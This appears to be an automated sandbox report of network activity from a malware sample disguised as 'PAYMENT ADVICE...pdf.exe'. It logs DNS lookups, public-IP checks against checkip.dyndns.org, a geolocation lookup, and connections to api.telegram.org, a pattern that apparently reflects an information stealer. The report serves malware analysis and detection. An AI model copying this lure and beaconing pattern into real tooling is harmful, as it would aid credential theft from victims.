                                                                                                                                  Dec 17, 2024 08:44:05.694528103 CET44349890149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:06.403275967 CET44349890149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:06.403366089 CET44349890149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:06.403444052 CET49890443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:06.403836966 CET49890443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:06.407279015 CET4988680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:06.408992052 CET4989680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:06.527374983 CET8049886158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:06.527483940 CET4988680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:06.528825998 CET8049896158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:06.528903961 CET4989680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:06.529033899 CET4989680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:06.648750067 CET8049896158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:07.736078024 CET8049896158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:07.737823963 CET49899443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:07.737870932 CET44349899149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:07.737986088 CET49899443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:07.738320112 CET49899443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:07.738331079 CET44349899149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:07.790047884 CET4989680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:09.100826979 CET44349899149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:09.102916956 CET49899443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:09.102946997 CET44349899149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:09.103001118 CET49899443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:09.103004932 CET44349899149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:09.804054976 CET44349899149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:09.804141998 CET44349899149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:09.804352045 CET49899443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:09.804702997 CET49899443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:09.807928085 CET4989680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:09.809494019 CET4990580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:09.927983999 CET8049896158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:09.928312063 CET4989680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:09.929263115 CET8049905158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:09.929332972 CET4990580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:09.929522038 CET4990580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:10.049376965 CET8049905158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:11.265780926 CET8049905158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:11.267385006 CET49910443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:11.267410040 CET44349910149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:11.267483950 CET49910443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:11.267837048 CET49910443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:11.267849922 CET44349910149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:11.321235895 CET4990580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:12.629793882 CET44349910149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:12.631871939 CET49910443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:12.631915092 CET44349910149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:12.631962061 CET49910443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:12.631970882 CET44349910149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:13.335553885 CET44349910149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:13.335680008 CET44349910149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:13.335896015 CET49910443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:13.336446047 CET49910443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:13.340235949 CET4990580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:13.341619015 CET4991580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:13.461353064 CET8049905158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:13.461430073 CET8049915158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:13.461836100 CET4990580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:13.462112904 CET4991580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:13.462217093 CET4991580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:13.582979918 CET8049915158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:14.697674990 CET8049915158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:14.699331999 CET49918443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:14.699387074 CET44349918149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:14.699603081 CET49918443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:14.699789047 CET49918443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:14.699804068 CET44349918149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:14.743113041 CET4991580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:16.059267044 CET44349918149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:16.063371897 CET49918443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:16.063421965 CET44349918149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:16.063483000 CET49918443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:16.063493013 CET44349918149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:16.782862902 CET44349918149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:16.782948017 CET44349918149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:16.783037901 CET49918443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:16.783533096 CET49918443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:16.786427021 CET4991580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:16.787373066 CET4992480192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:16.906789064 CET8049915158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:16.906924963 CET4991580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:16.907167912 CET8049924158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:16.907274008 CET4992480192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:16.907413960 CET4992480192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:17.027256012 CET8049924158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:18.116226912 CET8049924158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:18.164937973 CET4992480192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:20.809348106 CET49935443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:20.809420109 CET44349935149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:20.809495926 CET49935443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:20.809813976 CET49935443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:20.809830904 CET44349935149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:22.169610023 CET44349935149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:22.211855888 CET49935443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:22.335658073 CET8049753158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:22.335725069 CET4975380192.168.2.4158.101.44.242
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 17, 2024 08:42:55.316226959 CET5312853192.168.2.41.1.1.1
                                                                                                                                  Dec 17, 2024 08:42:55.454019070 CET53531281.1.1.1192.168.2.4
                                                                                                                                  Dec 17, 2024 08:42:58.350507021 CET6538953192.168.2.41.1.1.1
                                                                                                                                  Dec 17, 2024 08:42:58.589390993 CET53653891.1.1.1192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:03.310192108 CET5440053192.168.2.41.1.1.1
                                                                                                                                  Dec 17, 2024 08:43:03.452250957 CET53544001.1.1.1192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:05.965230942 CET4931053192.168.2.41.1.1.1
                                                                                                                                  Dec 17, 2024 08:43:06.105846882 CET53493101.1.1.1192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:13.587847948 CET6169953192.168.2.41.1.1.1
                                                                                                                                  Dec 17, 2024 08:43:13.818962097 CET53616991.1.1.1192.168.2.4
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Dec 17, 2024 08:42:55.316226959 CET192.168.2.41.1.1.10x8f49Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:42:58.350507021 CET192.168.2.41.1.1.10xb0f2Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:03.310192108 CET192.168.2.41.1.1.10xdb86Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:05.965230942 CET192.168.2.41.1.1.10x9ec4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:13.587847948 CET192.168.2.41.1.1.10x8443Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Dec 17, 2024 08:42:55.454019070 CET1.1.1.1192.168.2.40x8f49No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:42:58.589390993 CET1.1.1.1192.168.2.40xb0f2No error (0)drive.usercontent.google.com142.250.200.225A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:03.452250957 CET1.1.1.1192.168.2.40xdb86No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:03.452250957 CET1.1.1.1192.168.2.40xdb86No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:03.452250957 CET1.1.1.1192.168.2.40xdb86No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:03.452250957 CET1.1.1.1192.168.2.40xdb86No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:03.452250957 CET1.1.1.1192.168.2.40xdb86No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:03.452250957 CET1.1.1.1192.168.2.40xdb86No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:06.105846882 CET1.1.1.1192.168.2.40x9ec4No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:06.105846882 CET1.1.1.1192.168.2.40x9ec4No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 08:43:13.818962097 CET1.1.1.1192.168.2.40x8443No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                  • drive.google.com
                                                                                                                                  • drive.usercontent.google.com
                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • api.telegram.org
                                                                                                                                  • checkip.dyndns.org
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.449738158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:03.577646017 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:04.794939041 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 0c4b27f2355c167a7a409c6d0689dee6
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 17, 2024 08:43:04.799891949 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 17, 2024 08:43:05.180206060 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: be529f60280440d1188399a601a37c84
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 17, 2024 08:43:13.202642918 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 17, 2024 08:43:13.582544088 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:13 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: f99c3035fd525b7d4a1e3d55885cff52
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.449753158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:16.130964994 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 17, 2024 08:43:17.335628986 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:17 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: cba43254563e97355ce1bd6f6c40b214
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.449765158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:19.531661987 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:20.736805916 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:20 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: ffe3ef6735f99cb9c37612f5cb974f01
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.449772158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:22.933883905 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:24.142376900 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:23 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: f07514ee46759cd7c0f93f399daa0c1e
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.449783158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:26.314163923 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:27.522449970 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:27 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: fda26aadfc279275e2a14734b68c275f
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.449790158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:29.647578955 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:30.855303049 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:30 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 4dfc73a1349d7c58f39f7fdde6a61e0c
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.449800158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:33.088923931 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:34.292960882 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:34 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: ad4504bbe4eafcea8e3e92ac07b52ebe
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.449810158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:36.441560030 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 08:43:37.644859076 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:37 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 605bc873d7f4e843f54ed9abd0127482
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.449819158.101.44.242807788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 08:43:39.777172089 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
